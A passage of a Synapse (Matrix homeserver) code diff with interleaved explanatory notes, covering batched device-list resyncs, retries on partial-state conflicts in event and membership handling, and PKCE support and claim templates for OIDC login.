# Shortcut empty requests
return {}
try:
return await self._multi_user_device_resync_client(user_ids=user_ids)
except SynapseError as err:
if not (
err.code == HTTPStatus.NOT_FOUND and err.errcode == Codes.UNRECOGNIZED
):
raise
# Fall back to single requests
result: Dict[str, Optional[JsonDict]] = {}
for user_id in user_ids:
result[user_id] = await self._user_device_resync_client(user_id=user_id)
return result
async def user_device_resync(
self, user_id: str, mark_failed_as_stale: bool = True
@ -913,8 +951,10 @@ class DeviceListWorkerUpdater:
A dict with device info as under the "devices" in the result of this
request:
https://matrix.org/docs/spec/server_server/r0.1.2#get-matrix-federation-v1-user-devices-userid
None when we weren't able to fetch the device info for some reason,
e.g. due to a connection problem.
"""
return await self._user_device_resync_client(user_id=user_id)
return (await self.multi_user_device_resync([user_id]))[user_id]
class DeviceListUpdater(DeviceListWorkerUpdater):
@ -1160,19 +1200,66 @@ class DeviceListUpdater(DeviceListWorkerUpdater):
# Allow future calls to retry resyncing out-of-sync device lists.
self._resync_retry_in_progress = False
async def multi_user_device_resync(
self, user_ids: List[str], mark_failed_as_stale: bool = True
) -> Dict[str, Optional[JsonDict]]:
"""
Like `user_device_resync` but operates on multiple users **from the same origin**
at once.
Returns:
Dict from User ID to the same Dict as `user_device_resync`.
"""
if not user_ids:
return {}
origins = {UserID.from_string(user_id).domain for user_id in user_ids}
if len(origins) != 1:
raise InvalidAPICallError(f"Only one origin permitted, got {origins!r}")
result = {}
failed = set()
# TODO(Perf): Actually batch these up
for user_id in user_ids:
user_result, user_failed = await self._user_device_resync_returning_failed(
user_id
)
result[user_id] = user_result
if user_failed:
failed.add(user_id)
if mark_failed_as_stale:
await self.store.mark_remote_users_device_caches_as_stale(failed)
return result
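
The single-origin guard relies on the structure of Matrix user IDs, `@localpart:domain`: the origin is simply the server-name part. The check in isolation (example IDs are hypothetical):

def origin_of(user_id: str) -> str:
    # "@alice:example.com" -> "example.com"
    return user_id.split(":", 1)[1]

user_ids = ["@alice:example.com", "@bob:example.com"]
origins = {origin_of(u) for u in user_ids}
assert len(origins) == 1  # mixed origins would be rejected with a 400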
async def user_device_resync(
self, user_id: str, mark_failed_as_stale: bool = True
) -> Optional[JsonDict]:
result, failed = await self._user_device_resync_returning_failed(user_id)
if failed and mark_failed_as_stale:
# Mark the remote user's device list as stale so we know we need to retry
# it later.
await self.store.mark_remote_users_device_caches_as_stale((user_id,))
return result
async def _user_device_resync_returning_failed(
self, user_id: str
) -> Tuple[Optional[JsonDict], bool]:
"""Fetches all devices for a user and updates the device cache with them.
Args:
user_id: The user's id whose device_list will be updated.
mark_failed_as_stale: Whether to mark the user's device list as stale
if the attempt to resync failed.
Returns:
A dict with device info as under the "devices" in the result of this
request:
https://matrix.org/docs/spec/server_server/r0.1.2#get-matrix-federation-v1-user-devices-userid
- A dict with device info as under the "devices" in the result of this
request:
https://matrix.org/docs/spec/server_server/r0.1.2#get-matrix-federation-v1-user-devices-userid
None when we weren't able to fetch the device info for some reason,
e.g. due to a connection problem.
- True iff the resync failed and the device list should be marked as stale.
"""
logger.debug("Attempting to resync the device list for %s", user_id)
log_kv({"message": "Doing resync to update device list."})
@ -1181,12 +1268,7 @@ class DeviceListUpdater(DeviceListWorkerUpdater):
try:
result = await self.federation.query_user_devices(origin, user_id)
except NotRetryingDestination:
if mark_failed_as_stale:
# Mark the remote user's device list as stale so we know we need to retry
# it later.
await self.store.mark_remote_user_device_cache_as_stale(user_id)
return None
return None, True
except (RequestSendFailed, HttpResponseException) as e:
logger.warning(
"Failed to handle device list update for %s: %s",
@ -1194,23 +1276,18 @@ class DeviceListUpdater(DeviceListWorkerUpdater):
e,
)
if mark_failed_as_stale:
# Mark the remote user's device list as stale so we know we need to retry
# it later.
await self.store.mark_remote_user_device_cache_as_stale(user_id)
# We abort on exceptions rather than accepting the update
# as otherwise synapse will 'forget' that its device list
# is out of date. If we bail then we will retry the resync
# next time we get a device list update for this user_id.
# This makes it more likely that the device lists will
# eventually become consistent.
return None
return None, True
except FederationDeniedError as e:
set_tag("error", True)
log_kv({"reason": "FederationDeniedError"})
logger.info(e)
return None
return None, False
except Exception as e:
set_tag("error", True)
log_kv(
@ -1218,12 +1295,7 @@ class DeviceListUpdater(DeviceListWorkerUpdater):
)
logger.exception("Failed to handle device list update for %s", user_id)
if mark_failed_as_stale:
# Mark the remote user's device list as stale so we know we need to retry
# it later.
await self.store.mark_remote_user_device_cache_as_stale(user_id)
return None
return None, True
log_kv({"result": result})
stream_id = result["stream_id"]
devices = result["devices"]
@ -1305,7 +1377,7 @@ class DeviceListUpdater(DeviceListWorkerUpdater):
# point.
self._seen_updates[user_id] = {stream_id}
return result
return result, False
async def process_cross_signing_key_update(
self,

View File

@ -195,7 +195,7 @@ class DeviceMessageHandler:
sender_user_id,
unknown_devices,
)
await self.store.mark_remote_user_device_cache_as_stale(sender_user_id)
await self.store.mark_remote_users_device_caches_as_stale((sender_user_id,))
# Immediately attempt a resync in the background
run_in_background(self._user_device_resync, user_id=sender_user_id)

View File

@ -36,8 +36,8 @@ from synapse.types import (
get_domain_from_id,
get_verify_key_from_cross_signing_key,
)
from synapse.util import json_decoder, unwrapFirstError
from synapse.util.async_helpers import Linearizer, delay_cancellation
from synapse.util import json_decoder
from synapse.util.async_helpers import Linearizer, concurrently_execute
from synapse.util.cancellation import cancellable
from synapse.util.retryutils import NotRetryingDestination
@ -238,24 +238,28 @@ class E2eKeysHandler:
# Now fetch any devices that we don't have in our cache
# TODO It might make sense to propagate cancellations into the
# deferreds which are querying remote homeservers.
await make_deferred_yieldable(
delay_cancellation(
defer.gatherResults(
[
run_in_background(
self._query_devices_for_destination,
results,
cross_signing_keys,
failures,
destination,
queries,
timeout,
)
for destination, queries in remote_queries_not_in_cache.items()
],
consumeErrors=True,
).addErrback(unwrapFirstError)
logger.debug(
"%d destinations to query devices for", len(remote_queries_not_in_cache)
)
async def _query(
destination_queries: Tuple[str, Dict[str, Iterable[str]]]
) -> None:
destination, queries = destination_queries
return await self._query_devices_for_destination(
results,
cross_signing_keys,
failures,
destination,
queries,
timeout,
)
await concurrently_execute(
_query,
remote_queries_not_in_cache.items(),
10,
delay_cancellation=True,
)
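
`concurrently_execute` caps the fan-out at ten in-flight destination queries instead of launching one deferred per destination. An asyncio analogue of the semantics (Synapse's helper is Twisted-based and also handles cancellation delay, which this sketch omits):

import asyncio
from typing import Awaitable, Callable, Iterable, TypeVar

T = TypeVar("T")

async def concurrently_execute(
    func: Callable[[T], Awaitable[None]], args: Iterable[T], limit: int
) -> None:
    # Run func over args with at most `limit` coroutines in flight.
    sem = asyncio.Semaphore(limit)

    async def _run(arg: T) -> None:
        async with sem:
            await func(arg)

    await asyncio.gather(*(_run(a) for a in args))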
ret = {"device_keys": results, "failures": failures}
@ -300,28 +304,41 @@ class E2eKeysHandler:
# queries. We use the more efficient batched query_client_keys for all
# remaining users
user_ids_updated = []
for (user_id, device_list) in destination_query.items():
if user_id in user_ids_updated:
continue
if device_list:
continue
# Perform a user device resync for each user only once and only as long as:
# - they have an empty device_list
# - they are in some rooms that this server can see
users_to_resync_devices = {
user_id
for (user_id, device_list) in destination_query.items()
if (not device_list) and (await self.store.get_rooms_for_user(user_id))
}
room_ids = await self.store.get_rooms_for_user(user_id)
if not room_ids:
continue
logger.debug(
"%d users to resync devices for from destination %s",
len(users_to_resync_devices),
destination,
)
# We've decided we're sharing a room with this user and should
# probably be tracking their device lists. However, we haven't
# done an initial sync on the device list so we do it now.
try:
resync_results = (
await self.device_handler.device_list_updater.user_device_resync(
user_id
)
try:
user_resync_results = (
await self.device_handler.device_list_updater.multi_user_device_resync(
list(users_to_resync_devices)
)
)
for user_id in users_to_resync_devices:
resync_results = user_resync_results[user_id]
if resync_results is None:
raise ValueError("Device resync failed")
# TODO: It's weird that we'll store a failure against a
# destination, yet continue processing users from that
# destination.
# We might want to consider changing this, but for now
# I'm leaving it as I found it.
failures[destination] = _exception_to_failure(
ValueError(f"Device resync failed for {user_id!r}")
)
continue
# Add the device keys to the results.
user_devices = resync_results["devices"]
@ -339,8 +356,8 @@ class E2eKeysHandler:
if self_signing_key:
cross_signing_keys["self_signing_keys"][user_id] = self_signing_key
except Exception as e:
failures[destination] = _exception_to_failure(e)
except Exception as e:
failures[destination] = _exception_to_failure(e)
if len(destination_query) == len(user_ids_updated):
# We've updated all the users in the query and we do not need to

View File

@ -1343,32 +1343,53 @@ class FederationHandler:
)
EventValidator().validate_builder(builder, self.hs.config)
event, context = await self.event_creation_handler.create_new_client_event(
builder=builder
)
event, context = await self.add_display_name_to_third_party_invite(
room_version_obj, event_dict, event, context
)
# Try several times, it could fail with PartialStateConflictError
# in send_membership_event, cf comment in except block.
max_retries = 5
for i in range(max_retries):
try:
(
event,
context,
) = await self.event_creation_handler.create_new_client_event(
builder=builder
)
EventValidator().validate_new(event, self.config)
event, context = await self.add_display_name_to_third_party_invite(
room_version_obj, event_dict, event, context
)
# We need to tell the transaction queue to send this out, even
# though the sender isn't a local user.
event.internal_metadata.send_on_behalf_of = self.hs.hostname
EventValidator().validate_new(event, self.config)
try:
validate_event_for_room_version(event)
await self._event_auth_handler.check_auth_rules_from_context(event)
except AuthError as e:
logger.warning("Denying new third party invite %r because %s", event, e)
raise e
# We need to tell the transaction queue to send this out, even
# though the sender isn't a local user.
event.internal_metadata.send_on_behalf_of = self.hs.hostname
await self._check_signature(event, context)
try:
validate_event_for_room_version(event)
await self._event_auth_handler.check_auth_rules_from_context(
event
)
except AuthError as e:
logger.warning(
"Denying new third party invite %r because %s", event, e
)
raise e
# We retrieve the room member handler here as to not cause a cyclic dependency
member_handler = self.hs.get_room_member_handler()
await member_handler.send_membership_event(None, event, context)
await self._check_signature(event, context)
# We retrieve the room member handler here as to not cause a cyclic dependency
member_handler = self.hs.get_room_member_handler()
await member_handler.send_membership_event(None, event, context)
break
except PartialStateConflictError as e:
# Persisting couldn't happen because the room got un-partial stated
# in the meantime and context needs to be recomputed, so let's do so.
if i == max_retries - 1:
raise e
pass
else:
destinations = {x.split(":", 1)[-1] for x in (sender_user_id, room_id)}
@ -1400,28 +1421,46 @@ class FederationHandler:
room_version_obj, event_dict
)
event, context = await self.event_creation_handler.create_new_client_event(
builder=builder
)
event, context = await self.add_display_name_to_third_party_invite(
room_version_obj, event_dict, event, context
)
# Try several times, it could fail with PartialStateConflictError
# in send_membership_event, cf comment in except block.
max_retries = 5
for i in range(max_retries):
try:
(
event,
context,
) = await self.event_creation_handler.create_new_client_event(
builder=builder
)
event, context = await self.add_display_name_to_third_party_invite(
room_version_obj, event_dict, event, context
)
try:
validate_event_for_room_version(event)
await self._event_auth_handler.check_auth_rules_from_context(event)
except AuthError as e:
logger.warning("Denying third party invite %r because %s", event, e)
raise e
await self._check_signature(event, context)
try:
validate_event_for_room_version(event)
await self._event_auth_handler.check_auth_rules_from_context(event)
except AuthError as e:
logger.warning("Denying third party invite %r because %s", event, e)
raise e
await self._check_signature(event, context)
# We need to tell the transaction queue to send this out, even
# though the sender isn't a local user.
event.internal_metadata.send_on_behalf_of = get_domain_from_id(event.sender)
# We need to tell the transaction queue to send this out, even
# though the sender isn't a local user.
event.internal_metadata.send_on_behalf_of = get_domain_from_id(
event.sender
)
# We retrieve the room member handler here as to not cause a cyclic dependency
member_handler = self.hs.get_room_member_handler()
await member_handler.send_membership_event(None, event, context)
# We retrieve the room member handler here as to not cause a cyclic dependency
member_handler = self.hs.get_room_member_handler()
await member_handler.send_membership_event(None, event, context)
break
except PartialStateConflictError as e:
# Persisting couldn't happen because the room got un-partial stated
# in the meantime and context needs to be recomputed, so let's do so.
if i == max_retries - 1:
raise e
pass
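
This retry loop has the same shape at every call site the diff touches: event creation and persistence are wrapped in up to five attempts, because a room being un-partial-stated mid-flight invalidates the computed event context. The distilled pattern:

max_retries = 5
for i in range(max_retries):
    try:
        # (re)compute the event and its context, then persist it
        ...
        break
    except PartialStateConflictError:
        # The room was un-partial-stated in the meantime, so the context
        # is stale; give up only once the retry budget is spent.
        if i == max_retries - 1:
            raise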
async def add_display_name_to_third_party_invite(
self,

View File

@ -610,6 +610,8 @@ class FederationEventHandler:
self._state_storage_controller.notify_event_un_partial_stated(
event.event_id
)
# Notify that there's a new row in the un_partial_stated_events stream.
self._notifier.notify_replication()
@trace
async def backfill(
@ -1421,7 +1423,7 @@ class FederationEventHandler:
"""
try:
await self._store.mark_remote_user_device_cache_as_stale(sender)
await self._store.mark_remote_users_device_caches_as_stale((sender,))
# Immediately attempt a resync in the background
if self._config.worker.worker_app:

View File

@ -37,7 +37,6 @@ from synapse.api.errors import (
AuthError,
Codes,
ConsentNotGivenError,
LimitExceededError,
NotFoundError,
ShadowBanError,
SynapseError,
@ -1001,60 +1000,73 @@ class EventCreationHandler:
event.internal_metadata.stream_ordering,
)
event, context = await self.create_event(
requester,
event_dict,
txn_id=txn_id,
allow_no_prev_events=allow_no_prev_events,
prev_event_ids=prev_event_ids,
state_event_ids=state_event_ids,
outlier=outlier,
historical=historical,
depth=depth,
)
assert self.hs.is_mine_id(event.sender), "User must be our own: %s" % (
event.sender,
)
spam_check_result = await self.spam_checker.check_event_for_spam(event)
if spam_check_result != self.spam_checker.NOT_SPAM:
if isinstance(spam_check_result, tuple):
try:
[code, dict] = spam_check_result
raise SynapseError(
403,
"This message had been rejected as probable spam",
code,
dict,
)
except ValueError:
logger.error(
"Spam-check module returned invalid error value. Expecting [code, dict], got %s",
spam_check_result,
)
raise SynapseError(
403,
"This message has been rejected as probable spam",
Codes.FORBIDDEN,
)
# Backwards compatibility: if the return value is not an error code, it
# means the module returned an error message to be included in the
# SynapseError (which is now deprecated).
raise SynapseError(
403,
spam_check_result,
Codes.FORBIDDEN,
# Try several times, it could fail with PartialStateConflictError
# in handle_new_client_event, cf comment in except block.
max_retries = 5
for i in range(max_retries):
try:
event, context = await self.create_event(
requester,
event_dict,
txn_id=txn_id,
allow_no_prev_events=allow_no_prev_events,
prev_event_ids=prev_event_ids,
state_event_ids=state_event_ids,
outlier=outlier,
historical=historical,
depth=depth,
)
ev = await self.handle_new_client_event(
requester=requester,
events_and_context=[(event, context)],
ratelimit=ratelimit,
ignore_shadow_ban=ignore_shadow_ban,
)
assert self.hs.is_mine_id(event.sender), "User must be our own: %s" % (
event.sender,
)
spam_check_result = await self.spam_checker.check_event_for_spam(event)
if spam_check_result != self.spam_checker.NOT_SPAM:
if isinstance(spam_check_result, tuple):
try:
[code, dict] = spam_check_result
raise SynapseError(
403,
"This message had been rejected as probable spam",
code,
dict,
)
except ValueError:
logger.error(
"Spam-check module returned invalid error value. Expecting [code, dict], got %s",
spam_check_result,
)
raise SynapseError(
403,
"This message has been rejected as probable spam",
Codes.FORBIDDEN,
)
# Backwards compatibility: if the return value is not an error code, it
# means the module returned an error message to be included in the
# SynapseError (which is now deprecated).
raise SynapseError(
403,
spam_check_result,
Codes.FORBIDDEN,
)
ev = await self.handle_new_client_event(
requester=requester,
events_and_context=[(event, context)],
ratelimit=ratelimit,
ignore_shadow_ban=ignore_shadow_ban,
)
break
except PartialStateConflictError as e:
# Persisting couldn't happen because the room got un-partial stated
# in the meantime and context needs to be recomputed, so let's do so.
if i == max_retries - 1:
raise e
pass
# we know it was persisted, so must have a stream ordering
assert ev.internal_metadata.stream_ordering
@ -1363,7 +1375,7 @@ class EventCreationHandler:
Raises:
ShadowBanError if the requester has been shadow-banned.
SynapseError(503) if attempting to persist a partial state event in
PartialStateConflictError if attempting to persist a partial state event in
a room that has been un-partial stated.
"""
extra_users = extra_users or []
@ -1425,35 +1437,24 @@ class EventCreationHandler:
# We now persist the event (and update the cache in parallel, since we
# don't want to block on it).
event, context = events_and_context[0]
try:
result, _ = await make_deferred_yieldable(
gather_results(
(
run_in_background(
self._persist_events,
requester=requester,
events_and_context=events_and_context,
ratelimit=ratelimit,
extra_users=extra_users,
dont_notify=dont_notify,
),
run_in_background(
self.cache_joined_hosts_for_events, events_and_context
).addErrback(
log_failure, "cache_joined_hosts_for_event failed"
),
result, _ = await make_deferred_yieldable(
gather_results(
(
run_in_background(
self._persist_events,
requester=requester,
events_and_context=events_and_context,
ratelimit=ratelimit,
extra_users=extra_users,
dont_notify=dont_notify,
),
consumeErrors=True,
)
).addErrback(unwrapFirstError)
except PartialStateConflictError as e:
# The event context needs to be recomputed.
# Turn the error into a 429, as a hint to the client to try again.
logger.info(
"Room %s was un-partial stated while persisting client event.",
event.room_id,
run_in_background(
self.cache_joined_hosts_for_events, events_and_context
).addErrback(log_failure, "cache_joined_hosts_for_event failed"),
),
consumeErrors=True,
)
raise LimitExceededError(msg=e.msg, errcode=e.errcode, retry_after_ms=0)
).addErrback(unwrapFirstError)
return result
@ -2028,26 +2029,39 @@ class EventCreationHandler:
for user_id in members:
requester = create_requester(user_id, authenticated_entity=self.server_name)
try:
event, context = await self.create_event(
requester,
{
"type": EventTypes.Dummy,
"content": {},
"room_id": room_id,
"sender": user_id,
},
)
# Try several times, it could fail with PartialStateConflictError
# in handle_new_client_event, cf comment in except block.
max_retries = 5
for i in range(max_retries):
try:
event, context = await self.create_event(
requester,
{
"type": EventTypes.Dummy,
"content": {},
"room_id": room_id,
"sender": user_id,
},
)
event.internal_metadata.proactively_send = False
event.internal_metadata.proactively_send = False
# Since this is a dummy-event it is OK if it is sent by a
# shadow-banned user.
await self.handle_new_client_event(
requester,
events_and_context=[(event, context)],
ratelimit=False,
ignore_shadow_ban=True,
)
# Since this is a dummy-event it is OK if it is sent by a
# shadow-banned user.
await self.handle_new_client_event(
requester,
events_and_context=[(event, context)],
ratelimit=False,
ignore_shadow_ban=True,
)
break
except PartialStateConflictError as e:
# Persisting couldn't happen because the room got un-partial stated
# in the meantime and context needs to be recomputed, so let's do so.
if i == max_retries - 1:
raise e
pass
return True
except AuthError:
logger.info(

View File

@ -36,6 +36,7 @@ from authlib.jose import JsonWebToken, JWTClaims
from authlib.jose.errors import InvalidClaimError, JoseError, MissingClaimError
from authlib.oauth2.auth import ClientAuth
from authlib.oauth2.rfc6749.parameters import prepare_grant_uri
from authlib.oauth2.rfc7636.challenge import create_s256_code_challenge
from authlib.oidc.core import CodeIDToken, UserInfo
from authlib.oidc.discovery import OpenIDProviderMetadata, get_well_known_url
from jinja2 import Environment, Template
@ -475,6 +476,16 @@ class OidcProvider:
)
)
# If PKCE support is advertised ensure the wanted method is available.
if m.get("code_challenge_methods_supported") is not None:
m.validate_code_challenge_methods_supported()
if "S256" not in m["code_challenge_methods_supported"]:
raise ValueError(
'"S256" not in "code_challenge_methods_supported" ({supported!r})'.format(
supported=m["code_challenge_methods_supported"],
)
)
if m.get("response_types_supported") is not None:
m.validate_response_types_supported()
@ -602,6 +613,11 @@ class OidcProvider:
if self._config.jwks_uri:
metadata["jwks_uri"] = self._config.jwks_uri
if self._config.pkce_method == "always":
metadata["code_challenge_methods_supported"] = ["S256"]
elif self._config.pkce_method == "never":
metadata.pop("code_challenge_methods_supported", None)
self._validate_metadata(metadata)
return metadata
@ -653,7 +669,7 @@ class OidcProvider:
return jwk_set
async def _exchange_code(self, code: str) -> Token:
async def _exchange_code(self, code: str, code_verifier: str) -> Token:
"""Exchange an authorization code for a token.
This calls the ``token_endpoint`` with the authorization code we
@ -666,6 +682,7 @@ class OidcProvider:
Args:
code: The authorization code we got from the callback.
code_verifier: The PKCE code verifier to send, blank if unused.
Returns:
A dict containing various tokens.
@ -696,6 +713,8 @@ class OidcProvider:
"code": code,
"redirect_uri": self._callback_url,
}
if code_verifier:
args["code_verifier"] = code_verifier
body = urlencode(args, True)
# Fill the body/headers with credentials
@ -914,11 +933,14 @@ class OidcProvider:
- ``scope``: the list of scopes set in ``oidc_config.scopes``
- ``state``: a random string
- ``nonce``: a random string
- ``code_challenge``: a RFC7636 code challenge (if PKCE is supported)
In addition generating a redirect URL, we are setting a cookie with
a signed macaroon token containing the state, the nonce and the
client_redirect_url params. Those are then checked when the client
comes back from the provider.
In addition to generating a redirect URL, we are setting a cookie with
a signed macaroon token containing the state, the nonce, the
client_redirect_url, and (optionally) the code_verifier params. The state,
nonce, and client_redirect_url are then checked when the client comes back
from the provider. The code_verifier is passed back to the server during
the token exchange and compared to the code_challenge sent in this request.
Args:
request: the incoming request from the browser.
@ -935,10 +957,25 @@ class OidcProvider:
state = generate_token()
nonce = generate_token()
code_verifier = ""
if not client_redirect_url:
client_redirect_url = b""
metadata = await self.load_metadata()
# Automatically enable PKCE if it is supported.
extra_grant_values = {}
if metadata.get("code_challenge_methods_supported"):
code_verifier = generate_token(48)
# Note that we verified the server supports S256 earlier (in
# OidcProvider._validate_metadata).
extra_grant_values = {
"code_challenge_method": "S256",
"code_challenge": create_s256_code_challenge(code_verifier),
}
cookie = self._macaroon_generaton.generate_oidc_session_token(
state=state,
session_data=OidcSessionData(
@ -946,6 +983,7 @@ class OidcProvider:
nonce=nonce,
client_redirect_url=client_redirect_url.decode(),
ui_auth_session_id=ui_auth_session_id or "",
code_verifier=code_verifier,
),
)
@ -966,7 +1004,6 @@ class OidcProvider:
)
)
metadata = await self.load_metadata()
authorization_endpoint = metadata.get("authorization_endpoint")
return prepare_grant_uri(
authorization_endpoint,
@ -976,6 +1013,7 @@ class OidcProvider:
scope=self._scopes,
state=state,
nonce=nonce,
**extra_grant_values,
)
async def handle_oidc_callback(
@ -1003,7 +1041,9 @@ class OidcProvider:
# Exchange the code with the provider
try:
logger.debug("Exchanging OAuth2 code for a token")
token = await self._exchange_code(code)
token = await self._exchange_code(
code, code_verifier=session_data.code_verifier
)
except OidcError as e:
logger.warning("Could not exchange OAuth2 code: %s", e)
self._sso_handler.render_error(request, e.error, e.error_description)
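The S256 method negotiated above is defined by RFC 7636: the challenge is the unpadded base64url encoding of the SHA-256 hash of the verifier. A minimal sketch of what authlib's create_s256_code_challenge computes, using only the standard library (the helper name here is illustrative):

import base64
import hashlib
import secrets

def make_pkce_pair() -> tuple:
    """Return a (code_verifier, code_challenge) pair per RFC 7636 S256."""
    # A high-entropy, URL-safe verifier; generate_token(48) plays this role above.
    code_verifier = secrets.token_urlsafe(48)
    digest = hashlib.sha256(code_verifier.encode("ascii")).digest()
    # base64url without trailing "=" padding.
    code_challenge = base64.urlsafe_b64encode(digest).rstrip(b"=").decode("ascii")
    return code_verifier, code_challenge

The verifier stays in the signed session cookie and is only revealed at the token endpoint, where the provider recomputes the hash and compares it to the challenge sent with the authorization request.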
@ -1520,8 +1560,8 @@ env.filters.update(
@attr.s(slots=True, frozen=True, auto_attribs=True)
class JinjaOidcMappingConfig:
subject_claim: str
picture_claim: str
subject_template: Template
picture_template: Template
localpart_template: Optional[Template]
display_name_template: Optional[Template]
email_template: Optional[Template]
@ -1540,8 +1580,23 @@ class JinjaOidcMappingProvider(OidcMappingProvider[JinjaOidcMappingConfig]):
@staticmethod
def parse_config(config: dict) -> JinjaOidcMappingConfig:
subject_claim = config.get("subject_claim", "sub")
picture_claim = config.get("picture_claim", "picture")
def parse_template_config_with_claim(
option_name: str, default_claim: str
) -> Template:
template_name = f"{option_name}_template"
template = config.get(template_name)
if not template:
# Convert the legacy subject_claim into a template.
claim = config.get(f"{option_name}_claim", default_claim)
template = "{{ user.%s }}" % (claim,)
try:
return env.from_string(template)
except Exception as e:
raise ConfigError("invalid jinja template", path=[template_name]) from e
subject_template = parse_template_config_with_claim("subject", "sub")
picture_template = parse_template_config_with_claim("picture", "picture")
def parse_template_config(option_name: str) -> Optional[Template]:
if option_name not in config:
@ -1574,8 +1629,8 @@ class JinjaOidcMappingProvider(OidcMappingProvider[JinjaOidcMappingConfig]):
raise ConfigError("must be a bool", path=["confirm_localpart"])
return JinjaOidcMappingConfig(
subject_claim=subject_claim,
picture_claim=picture_claim,
subject_template=subject_template,
picture_template=picture_template,
localpart_template=localpart_template,
display_name_template=display_name_template,
email_template=email_template,
@ -1584,7 +1639,7 @@ class JinjaOidcMappingProvider(OidcMappingProvider[JinjaOidcMappingConfig]):
)
def get_remote_user_id(self, userinfo: UserInfo) -> str:
return userinfo[self._config.subject_claim]
return self._config.subject_template.render(user=userinfo).strip()
async def map_user_attributes(
self, userinfo: UserInfo, token: Token, failures: int
@ -1615,7 +1670,7 @@ class JinjaOidcMappingProvider(OidcMappingProvider[JinjaOidcMappingConfig]):
if email:
emails.append(email)
picture = userinfo.get("picture")
picture = self._config.picture_template.render(user=userinfo).strip()
return UserAttributeDict(
localpart=localpart,
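To illustrate the template-based mapping above: a legacy subject_claim/picture_claim option is converted into an equivalent Jinja template, which is then rendered against the userinfo object. A small sketch, assuming a hypothetical userinfo payload:

from jinja2 import Environment

env = Environment()

# Hypothetical userinfo returned by an IdP.
userinfo = {"sub": "abc123", "picture": "https://idp.example/alice.png"}

# Legacy `subject_claim: sub` becomes the template "{{ user.sub }}".
subject_template = env.from_string("{{ user.sub }}")
picture_template = env.from_string("{{ user.picture }}")

assert subject_template.render(user=userinfo).strip() == "abc123"
assert picture_template.render(user=userinfo).strip() == "https://idp.example/alice.png"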

View File

@ -62,6 +62,7 @@ from synapse.events.utils import copy_and_fixup_power_levels_contents
from synapse.handlers.relations import BundledAggregations
from synapse.module_api import NOT_SPAM
from synapse.rest.admin._base import assert_user_is_admin
from synapse.storage.databases.main.events import PartialStateConflictError
from synapse.streams import EventSource
from synapse.types import (
JsonDict,
@ -207,46 +208,64 @@ class RoomCreationHandler:
new_room_id = self._generate_room_id()
# Check whether the user has the power level to carry out the upgrade.
# `check_auth_rules_from_context` will check that they are in the room and have
# the required power level to send the tombstone event.
(
tombstone_event,
tombstone_context,
) = await self.event_creation_handler.create_event(
requester,
{
"type": EventTypes.Tombstone,
"state_key": "",
"room_id": old_room_id,
"sender": user_id,
"content": {
"body": "This room has been replaced",
"replacement_room": new_room_id,
},
},
)
validate_event_for_room_version(tombstone_event)
await self._event_auth_handler.check_auth_rules_from_context(tombstone_event)
# Try several times, it could fail with PartialStateConflictError
# in _upgrade_room, cf comment in except block.
max_retries = 5
for i in range(max_retries):
try:
# Check whether the user has the power level to carry out the upgrade.
# `check_auth_rules_from_context` will check that they are in the room and have
# the required power level to send the tombstone event.
(
tombstone_event,
tombstone_context,
) = await self.event_creation_handler.create_event(
requester,
{
"type": EventTypes.Tombstone,
"state_key": "",
"room_id": old_room_id,
"sender": user_id,
"content": {
"body": "This room has been replaced",
"replacement_room": new_room_id,
},
},
)
validate_event_for_room_version(tombstone_event)
await self._event_auth_handler.check_auth_rules_from_context(
tombstone_event
)
# Upgrade the room
#
# If this user has sent multiple upgrade requests for the same room
# and one of them is not complete yet, cache the response and
# return it to all subsequent requests
ret = await self._upgrade_response_cache.wrap(
(old_room_id, user_id),
self._upgrade_room,
requester,
old_room_id,
old_room, # args for _upgrade_room
new_room_id,
new_version,
tombstone_event,
tombstone_context,
)
# Upgrade the room
#
# If this user has sent multiple upgrade requests for the same room
# and one of them is not complete yet, cache the response and
# return it to all subsequent requests
ret = await self._upgrade_response_cache.wrap(
(old_room_id, user_id),
self._upgrade_room,
requester,
old_room_id,
old_room, # args for _upgrade_room
new_room_id,
new_version,
tombstone_event,
tombstone_context,
)
return ret
return ret
except PartialStateConflictError as e:
# Clean up the cache so we can retry properly
self._upgrade_response_cache.unset((old_room_id, user_id))
# Persisting couldn't happen because the room got un-partial stated
# in the meantime and context needs to be recomputed, so let's do so.
if i == max_retries - 1:
raise e
pass
# This is to satisfy mypy and should never happen
raise PartialStateConflictError()
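The retry loop above recurs in several handlers in this release. A condensed sketch of the idiom, with create_and_persist standing in as a hypothetical zero-argument coroutine factory that recomputes the event context on each attempt:

from typing import Awaitable, Callable, TypeVar

from synapse.storage.databases.main.events import PartialStateConflictError

T = TypeVar("T")

async def persist_with_retry(
    create_and_persist: Callable[[], Awaitable[T]], max_retries: int = 5
) -> T:
    """Retry when the room is un-partial-stated mid-flight (sketch only)."""
    for i in range(max_retries):
        try:
            # The event must be recreated *inside* the loop so the
            # context is fresh on every attempt.
            return await create_and_persist()
        except PartialStateConflictError:
            # The context is stale; loop to recompute it, re-raising
            # on the final attempt.
            if i == max_retries - 1:
                raise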
async def _upgrade_room(
self,

View File

@ -394,6 +394,8 @@ class RoomBatchHandler:
# Events are sorted by (topological_ordering, stream_ordering)
# where topological_ordering is just depth.
for (event, context) in reversed(events_to_persist):
# This call can't raise `PartialStateConflictError` since we forbid
# use of the historical batch API during partial state
await self.event_creation_handler.handle_new_client_event(
await self.create_requester_for_user_id_from_app_service(
event.sender, app_service_requester.app_service

View File

@ -34,6 +34,7 @@ from synapse.events.snapshot import EventContext
from synapse.handlers.profile import MAX_AVATAR_URL_LEN, MAX_DISPLAYNAME_LEN
from synapse.logging import opentracing
from synapse.module_api import NOT_SPAM
from synapse.storage.databases.main.events import PartialStateConflictError
from synapse.types import (
JsonDict,
Requester,
@ -392,60 +393,81 @@ class RoomMemberHandler(metaclass=abc.ABCMeta):
event_pos = await self.store.get_position_for_event(existing_event_id)
return existing_event_id, event_pos.stream
event, context = await self.event_creation_handler.create_event(
    requester,
    {
        "type": EventTypes.Member,
        "content": content,
        "room_id": room_id,
        "sender": requester.user.to_string(),
        "state_key": user_id,
        # For backwards compatibility:
        "membership": membership,
        "origin_server_ts": origin_server_ts,
    },
    txn_id=txn_id,
    allow_no_prev_events=allow_no_prev_events,
    prev_event_ids=prev_event_ids,
    state_event_ids=state_event_ids,
    depth=depth,
    require_consent=require_consent,
    outlier=outlier,
    historical=historical,
)
prev_state_ids = await context.get_prev_state_ids(
    StateFilter.from_types([(EventTypes.Member, None)])
)
prev_member_event_id = prev_state_ids.get((EventTypes.Member, user_id), None)
if event.membership == Membership.JOIN:
    newly_joined = True
    if prev_member_event_id:
        prev_member_event = await self.store.get_event(prev_member_event_id)
        newly_joined = prev_member_event.membership != Membership.JOIN
